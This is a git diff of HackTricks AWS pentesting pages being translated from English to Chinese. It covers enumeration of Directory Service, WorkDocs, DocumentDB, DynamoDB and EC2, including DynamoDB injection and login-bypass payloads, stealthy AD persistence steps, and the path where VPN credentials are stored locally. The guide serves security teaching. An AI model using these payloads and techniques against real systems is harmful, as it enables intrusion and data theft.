用户池**:这与 Cognito 用户池相同。 +- **云目录**:这是**最简单**的一个。一个**无服务器**目录,您指明要使用的**模式**,并根据**使用情况计费**。 -AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**. 
+AWS 目录服务允许与您现有的**本地** Microsoft AD**同步**,**在 AWS 中运行您自己的**,或与**其他目录类型**同步。 -### Lab +### 实验室 -Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) - -### Enumeration +在这里,您可以找到一个很好的教程,帮助您在 AWS 中创建自己的 Microsoft AD:[https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) +### 枚举 ```bash # Get directories and DCs aws ds describe-directories @@ -36,10 +35,9 @@ aws ds get-directory-limits aws ds list-certificates --directory-id aws ds describe-certificate --directory-id --certificate-id ``` +### 登录 -### Login - -Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:** +请注意,如果目录的**描述**字段中的**`AccessUrl`**包含**域**,则可能是因为**用户**可以使用其**AD凭据**在某些**AWS服务**中**登录**: - `.awsapps.com/connect` (Amazon Connect) - `.awsapps.com/workdocs` (Amazon WorkDocs) @@ -47,40 +45,39 @@ Note that if the **description** of the directory contained a **domain** in the - `.awsapps.com/console` (Amazon Management Console) - `.awsapps.com/start` (IAM Identity Center) -### Privilege Escalation +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-directory-services-privesc.md {{#endref}} -## Persistence +## 持久性 -### Using an AD user +### 使用AD用户 -An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console. +可以通过角色赋予**AD用户**对**AWS管理控制台**的**访问权限**。**默认用户名是Admin**,可以从AWS控制台**更改其密码**。 -Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\ -It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth). +因此,可以**更改Admin的密码**,**创建新用户**或**更改用户的密码**并授予该用户一个角色以保持访问权限。\ +还可以**将用户添加到AD中的组**并**授予该AD组对角色的访问权限**(以使此持久性更加隐蔽)。 -### Sharing AD (from victim to attacker) +### 共享AD(从受害者到攻击者) -It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\ -However, this implies sharing the managed AD and also creating an VPC peering connection. +可以将AD环境从受害者共享给攻击者。这样,攻击者将能够继续访问AD环境。\ +然而,这意味着要共享托管的AD并创建VPC对等连接。 -You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) +您可以在此找到指南:[https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) -### ~~Sharing AD (from attacker to victim)~~ +### ~~共享AD(从攻击者到受害者)~~ -It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account. +似乎不可能将AWS访问权限授予来自不同AD环境的用户到一个AWS账户。 ## WorkDocs -Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. 
It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents. +Amazon Web Services (AWS) WorkDocs是一个基于云的**文件存储和共享服务**。它是AWS云计算服务套件的一部分,旨在为组织提供一个安全且可扩展的解决方案,以存储、共享和协作处理文件和文档。 -AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools. - -### Enumeration +AWS WorkDocs提供了一个基于Web的界面,供用户上传、访问和管理其文件和文档。它还提供版本控制、实时协作以及与其他AWS服务和第三方工具的集成等功能。 +### 枚举 ```bash # Get AD users (Admin not included) aws workdocs describe-users --organization-id @@ -109,7 +106,6 @@ aws workdocs describe-resource-permissions --resource-id aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` - ### Privesc {{#ref}} @@ -117,7 +113,3 @@ aws workdocs add-resource-permissions --resource-id --principals Id=anonymo {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md index caf35d03c..313dbc022 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md @@ -4,10 +4,9 @@ ## DocumentDB -Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. 
+亚马逊 DocumentDB,兼容 MongoDB,被呈现为一个 **快速、可靠且完全托管的数据库服务**。旨在简化部署、操作和可扩展性,它允许 **在云中无缝迁移和操作与 MongoDB 兼容的数据库**。用户可以利用此服务执行现有的应用程序代码,并使用熟悉的驱动程序和工具,确保平滑过渡和操作,类似于使用 MongoDB。 ### Enumeration - ```bash aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" aws docdb describe-db-instances #Get hostnames from here @@ -20,10 +19,9 @@ aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name ``` +### NoSQL 注入 -### NoSQL Injection - -As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: +由于 DocumentDB 是一个与 MongoDB 兼容的数据库,您可以想象它也容易受到常见的 NoSQL 注入攻击: {{#ref}} https://book.hacktricks.xyz/pentesting-web/nosql-injection @@ -35,12 +33,8 @@ https://book.hacktricks.xyz/pentesting-web/nosql-injection ../aws-unauthenticated-enum-access/aws-documentdb-enum.md {{#endref}} -## References +## 参考 - [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md index cb0864715..f2187a0a1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md @@ -4,30 +4,29 @@ ## DynamoDB -### Basic Information +### 基本信息 -Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities. +Amazon DynamoDB 被 AWS 提供为一个 **完全托管的无服务器键值 NoSQL 数据库**,旨在支持高性能应用程序,无论其规模如何。该服务确保了强大的功能,包括固有的安全措施、不间断的备份、跨多个区域的自动复制、集成的内存缓存和方便的数据导出工具。 -In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization. +在 DynamoDB 的上下文中,**创建的是表**,而不是建立传统数据库。每个表都要求指定一个 **分区键**,作为 **表主键** 的一个组成部分。这个分区键,实质上是一个 **哈希值**,在项目的检索和数据在不同主机之间的分配中起着关键作用。这种分配对于维护数据库的可扩展性和可用性至关重要。此外,还可以选择添加 **排序键** 以进一步细化数据组织。 -### Encryption +### 加密 -By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account. +默认情况下,DynamoDB 使用一个 **属于 Amazon DynamoDB 的 KMS 密钥,** 甚至不是至少属于您账户的 AWS 管理密钥。
-### Backups & Export to S3 +### 备份与导出到 S3 -It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations. +可以 **安排** 生成 **表备份** 或按 **需** 创建它们。此外,还可以为表启用 **时间点恢复 (PITR)**。时间点恢复为您的 DynamoDB 数据提供连续的 **备份**,持续 **35 天**,以帮助您防止意外的写入或删除操作。 -It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**. +还可以将 **表的数据导出到 S3**,但该表需要启用 **PITR**。 ### GUI -There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin) - -### Enumeration +有一个用于本地 Dynamo 服务的 GUI,如 [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/)、[dynalite](https://github.com/mhart/dynalite)、[localstack](https://github.com/localstack/localstack) 等,这些可能会很有用:[https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin) +### 枚举 ```bash # Tables aws dynamodb list-tables @@ -36,7 +35,7 @@ aws dynamodb describe-table --table-name #Get metadata info #Check if point in time recovery is enabled aws dynamodb describe-continuous-backups \ - --table-name tablename +--table-name tablename # Backups aws dynamodb list-backups @@ -54,129 +53,112 @@ aws dynamodb describe-export --export-arn # Misc aws dynamodb describe-endpoints #Dynamodb endpoints ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md {{#endref}} -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-dynamodb-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-dynamodb-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-dynamodb-persistence.md {{#endref}} -## DynamoDB Injection +## DynamoDB 注入 -### SQL Injection +### SQL 注入 -There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. +有方法可以使用 **SQL 语法** 访问 DynamoDB 数据,因此,典型的 **SQL 注入也是可能的**。 {{#ref}} https://book.hacktricks.xyz/pentesting-web/sql-injection {{#endref}} -### NoSQL Injection +### NoSQL 注入 -In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\ -You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) +在 DynamoDB 中,可以使用不同的 **条件** 来检索数据,就像在常见的 NoSQL 注入中,如果可以 **链接更多条件以检索** 数据,您可能会获得隐藏数据(或转储整个表)。\ +您可以在这里找到 DynamoDB 支持的条件:[https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) -Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**. 
+请注意,如果通过 **`query`** 或 **`scan`** 访问数据,则支持 **不同的条件**。 > [!NOTE] -> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). - -If you can **change the comparison** performed or add new ones, you could retrieve more data. +> 实际上,**Query** 操作需要在 **主** 键中指定 **条件 "EQ"(等于)** 才能工作,这使其 **更不容易受到 NoSQL 注入**(并且还使操作非常有限)。 +如果您可以 **更改比较** 或添加新的比较,您可以检索更多数据。 ```bash # Comparators to dump the database "NE": "a123" #Get everything that doesn't equal "a123" "NOT_CONTAINS": "a123" #What you think "GT": " " #All strings are greater than a space ``` - {{#ref}} https://book.hacktricks.xyz/pentesting-web/nosql-injection {{#endref}} -### Raw Json injection +### 原始 Json 注入 > [!CAUTION] -> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!** +> **此漏洞基于现已弃用的 dynamodb 扫描过滤器!** -**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. - -For example, injecting in a request like: +**DynamoDB** 接受 **Json** 对象以 **搜索** 数据。如果您发现可以在发送的 json 对象中进行写入,您可以使数据库转储所有内容。 +例如,在请求中注入: ```bash '{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}' ``` - -an attacker could inject something like: +攻击者可以注入类似于: `1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0` -fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all. - -Another **vulnerable example using a login** could be: +修复“EQ”条件,搜索 ID 1000,然后查找所有 Id 字符串大于 0 的数据,即所有数据。 +另一个**使用登录的脆弱示例**可以是: ```python scan_filter = """{ - "username": { - "ComparisonOperator": "EQ", - "AttributeValueList": [{"S": "%s"}] - }, - "password": { - "ComparisonOperator": "EQ", - "AttributeValueList": [{"S": "%s"}] - } +"username": { +"ComparisonOperator": "EQ", +"AttributeValueList": [{"S": "%s"}] +}, +"password": { +"ComparisonOperator": "EQ", +"AttributeValueList": [{"S": "%s"}] +} } """ % (user_data['username'], user_data['password']) dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter)) ``` - -This would be vulnerable to: - +这将容易受到以下攻击: ``` username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none ``` - ### :property Injection -Some SDKs allows to use a string indicating the filtering to be performed like: - +某些 SDK 允许使用一个字符串来指示要执行的过滤,例如: ```java new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap) ``` +您需要知道,在DynamoDB中搜索以**替换**属性**值**在**过滤表达式**中扫描项目时,令牌应**以**`:`**字符开头。这样的令牌将在运行时**替换**为实际的**属性值**。 -You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**. 
- -Therefore, a login like the previous one can be bypassed with something like: - +因此,像之前的登录可以通过以下方式绕过: ```bash :username = :username or :username # This will generate the query: # :username = :username or :username = :username and Password = :password # which is always true ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index f365bc7f5..0281b5423 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -4,7 +4,7 @@ ## VPC & Networking -Learn what a VPC is and about its components in: +了解什么是 VPC 及其组件: {{#ref}} aws-vpc-and-networking-basic-information.md @@ -12,37 +12,36 @@ aws-vpc-and-networking-basic-information.md ## EC2 -Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions. +Amazon EC2 用于启动 **虚拟服务器**。它允许配置 **安全性** 和 **网络**,以及管理 **存储**。Amazon EC2 的灵活性体现在其能够向上和向下扩展资源,有效适应不同的需求变化或流行度激增。这一特性减少了对精确流量预测的必要性。 -Interesting things to enumerate in EC2: +在 EC2 中有趣的枚举内容: -- Virtual Machines - - SSH Keys - - User Data - - Existing EC2s/AMIs/Snapshots -- Networking - - Networks - - Subnetworks - - Public IPs - - Open ports -- Integrated connections with other networks outside AWS +- 虚拟机 +- SSH 密钥 +- 用户数据 +- 现有的 EC2/AMI/快照 +- 网络 +- 网络 +- 子网络 +- 公共 IP +- 开放端口 +- 与 AWS 之外的其他网络的集成连接 -### Instance Profiles +### 实例配置文件 -Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications. +使用 **角色** 授予在 **EC2 实例** 上运行的应用程序权限需要额外的配置。运行在 EC2 实例上的应用程序通过虚拟化操作系统与 AWS 隔离。因此,您需要额外的步骤将 AWS 角色及其相关权限分配给 EC2 实例,并使其对应用程序可用。 -This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions. 
+这一步骤是 **创建一个** [_**实例配置文件**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) 附加到实例。**实例配置文件包含角色,并且**可以向在实例上运行的应用程序提供角色的临时凭证。这些临时凭证可以在应用程序的 API 调用中使用,以访问资源,并限制访问仅限于角色指定的那些资源。请注意,**一次只能将一个角色分配给 EC2 实例**,并且实例上的所有应用程序共享相同的角色和权限。 -### Metadata Endpoint +### 元数据端点 -AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname. +AWS EC2 元数据是关于 Amazon Elastic Compute Cloud (EC2) 实例的信息,在运行时可供实例使用。这些元数据用于提供有关实例的信息,例如其实例 ID、它运行的可用区、与实例关联的 IAM 角色以及实例的主机名。 {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} -### Enumeration - +### 枚举 ```bash # Get EC2 instances aws ec2 describe-instances @@ -50,10 +49,10 @@ aws ec2 describe-instance-status #Get status from running instances # Get user data from each ec2 instance for instanceid in $(aws ec2 describe-instances --profile --region us-west-2 | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do - echo "Instance ID: $instanceid" - aws ec2 describe-instance-attribute --profile --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d - echo "" - echo "-------------------" +echo "Instance ID: $instanceid" +aws ec2 describe-instance-attribute --profile --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d +echo "" +echo "-------------------" done # Instance profiles @@ -128,22 +127,21 @@ aws ec2 describe-route-tables aws ec2 describe-vpcs aws ec2 describe-vpc-peering-connections ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md {{#endref}} -### Privesc +### 权限提升 -In the following page you can check how to **abuse EC2 permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用EC2权限以提升权限**: {{#ref}} ../../aws-privilege-escalation/aws-ec2-privesc.md {{#endref}} -### Post-Exploitation +### 后期利用 {{#ref}} ../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/ @@ -151,17 +149,17 @@ In the following page you can check how to **abuse EC2 permissions to escalate p ## EBS -Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally. +亚马逊**EBS**(弹性块存储)**快照**基本上是AWS EBS卷的静态**备份**。换句话说,它们是特定时间点上附加到**EC2**实例的**磁盘**的**副本**。EBS快照可以跨区域和账户复制,甚至可以下载并在本地运行。 -Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it. +快照可能包含**敏感信息**,例如**源代码或API密钥**,因此,如果有机会,建议检查它。 -### Difference AMI & EBS +### AMI与EBS的区别 -An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application. 
+**AMI**用于**启动EC2实例**,而EC2**快照**用于**备份和恢复存储在EBS卷上的数据**。虽然EC2快照可以用于创建新的AMI,但它与AMI并不相同,并且不包含运行应用程序所需的操作系统、应用服务器或其他软件的信息。 -### Privesc +### 权限提升 -In the following page you can check how to **abuse EBS permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用EBS权限以提升权限**: {{#ref}} ../../aws-privilege-escalation/aws-ebs-privesc.md @@ -169,14 +167,13 @@ In the following page you can check how to **abuse EBS permissions to escalate p ## SSM -**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API. +**亚马逊简单系统管理器(SSM)**允许远程管理EC2实例的浮动,使其管理变得更加简单。这些实例中的每一个都需要运行**SSM代理服务,因为该服务将负责从AWS API获取并执行操作**。 -**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request. +**SSM代理**使系统管理器能够更新、管理和配置这些资源。代理**处理来自AWS云中系统管理器服务的请求**,然后按请求中指定的方式运行它们。 -The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate. - -### Enumeration +**SSM代理**[**在某些AMI中预安装**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html),或者您需要在实例上[**手动安装它们**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html)。此外,实例中使用的IAM角色需要附加**AmazonEC2RoleforSSM**策略才能进行通信。 +### 枚举 ```bash aws ssm describe-instance-information aws ssm describe-parameters @@ -185,16 +182,13 @@ aws ssm describe-instance-patches --instance-id aws ssm describe-instance-patch-states --instance-ids aws ssm describe-instance-associations-status --instance-id ``` - -You can check in an EC2 instance if Systems Manager is runnign just by executing: - +您可以通过执行以下命令检查 EC2 实例中是否正在运行 Systems Manager: ```bash ps aux | grep amazon-ssm ``` - ### Privesc -In the following page you can check how to **abuse SSM permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用SSM权限以提升权限**: {{#ref}} ../../aws-privilege-escalation/aws-ssm-privesc.md @@ -202,10 +196,9 @@ In the following page you can check how to **abuse SSM permissions to escalate p ## ELB -**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands. 
+**弹性负载均衡**(ELB)是**亚马逊网络服务**(AWS)部署的**负载均衡服务**。ELB自动**分配传入的应用程序流量**并根据流量需求扩展资源。 ### Enumeration - ```bash # List internet-facing ELBs aws elb describe-load-balancers @@ -216,11 +209,9 @@ aws elbv2 describe-load-balancers aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName' aws elbv2 describe-listeners --load-balancer-arn ``` +## 启动模板与自动扩展组 -## Launch Templates & Autoscaling Groups - -### Enumeration - +### 枚举 ```bash # Launch templates aws ec2 describe-launch-templates @@ -235,12 +226,11 @@ aws autoscaling describe-launch-configurations aws autoscaling describe-load-balancer-target-groups aws autoscaling describe-load-balancers ``` - ## Nitro -AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. +AWS Nitro 是一套 **创新技术**,构成了 AWS EC2 实例的基础平台。由亚马逊推出以 **增强安全性、性能和可靠性**,Nitro 利用定制的 **硬件组件和轻量级虚拟机监控器**。它将传统虚拟化功能的大部分抽象到专用硬件和软件中,**最小化攻击面**并提高资源效率。通过卸载虚拟化功能,Nitro 使 EC2 实例能够提供 **接近裸金属的性能**,这对资源密集型应用特别有利。此外,Nitro 安全芯片专门确保 **硬件和固件的安全性**,进一步巩固其强大的架构。 -Get more information and how to enumerate it from: +获取更多信息以及如何枚举它: {{#ref}} aws-nitro-enum.md @@ -248,35 +238,34 @@ aws-nitro-enum.md ## VPN -A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet. +VPN 允许将您的 **本地网络(站点到站点 VPN)** 或 **工作人员的笔记本电脑(客户端 VPN)** 连接到 **AWS VPC**,以便可以在不需要将其暴露于互联网的情况下访问服务。 -#### Basic AWS VPN Components +#### 基本 AWS VPN 组件 -1. **Customer Gateway**: - - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. -2. **Virtual Private Gateway**: - - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - - It is attached to your VPC and serves as the target for your VPN connection. - - VPG is the AWS side endpoint for the VPN connection. - - It handles the secure communication between your VPC and your on-premises network. -3. **Site-to-Site VPN Connection**: - - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - - This type of connection requires a Customer Gateway and a Virtual Private Gateway. - - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. -4. 
**Client VPN Endpoint**: - - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - - With Client VPN, each client device uses a VPN client software to establish a secure connection. +1. **客户网关**: +- 客户网关是您在 AWS 中创建的资源,用于表示 VPN 连接的一侧。 +- 它本质上是您在站点到站点 VPN 连接一侧的物理设备或软件应用程序。 +- 您向 AWS 提供路由信息和网络设备的公共 IP 地址(例如路由器或防火墙),以创建客户网关。 +- 它作为设置 VPN 连接的参考点,不会产生额外费用。 +2. **虚拟私有网关**: +- 虚拟私有网关(VPG)是站点到站点 VPN 连接的亚马逊端的 VPN 集中器。 +- 它附加到您的 VPC,并作为您的 VPN 连接的目标。 +- VPG 是 VPN 连接的 AWS 端点。 +- 它处理您的 VPC 和本地网络之间的安全通信。 +3. **站点到站点 VPN 连接**: +- 站点到站点 VPN 连接通过安全的 IPsec VPN 隧道将您的本地网络连接到 VPC。 +- 这种类型的连接需要客户网关和虚拟私有网关。 +- 它用于数据中心或网络与 AWS 环境之间的安全、稳定和一致的通信。 +- 通常用于常规的长期连接,并根据通过连接传输的数据量计费。 +4. **客户端 VPN 端点**: +- 客户端 VPN 端点是您在 AWS 中创建的资源,用于启用和管理客户端 VPN 会话。 +- 它用于允许单个设备(如笔记本电脑、智能手机等)安全地连接到 AWS 资源或您的本地网络。 +- 它与站点到站点 VPN 的不同之处在于,它是为单个客户端设计的,而不是连接整个网络。 +- 使用客户端 VPN,每个客户端设备使用 VPN 客户端软件建立安全连接。 -You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn). +您可以 [**在这里找到有关 AWS VPN 的好处和组件的更多信息**](aws-vpc-and-networking-basic-information.md#vpn)。 ### Enumeration - ```bash # VPN endpoints ## Check used subnetwork, authentication, SGs, connected... @@ -300,31 +289,26 @@ aws ec2 describe-vpn-gateways # Get VPN site-to-site connections aws ec2 describe-vpn-connections ``` +### 本地枚举 -### Local Enumeration +**本地临时凭证** -**Local Temporary Credentials** +当使用 AWS VPN 客户端连接到 VPN 时,用户通常会 **登录到 AWS** 以获取对 VPN 的访问权限。然后,一些 **AWS 凭证被创建并存储** 在本地以建立 VPN 连接。这些凭证 **存储在** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` 中,包含 **AccessKey**、**SecretKey** 和 **Token**。 -When AWS VPN Client is used to connect to a VPN, the user will usually **login in AWS** to get access to the VPN. Then, some **AWS credentials are created and stored** locally to establish the VPN connection. These credentials are **stored in** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` and contains an **AccessKey**, a **SecretKey** and a **Token**. 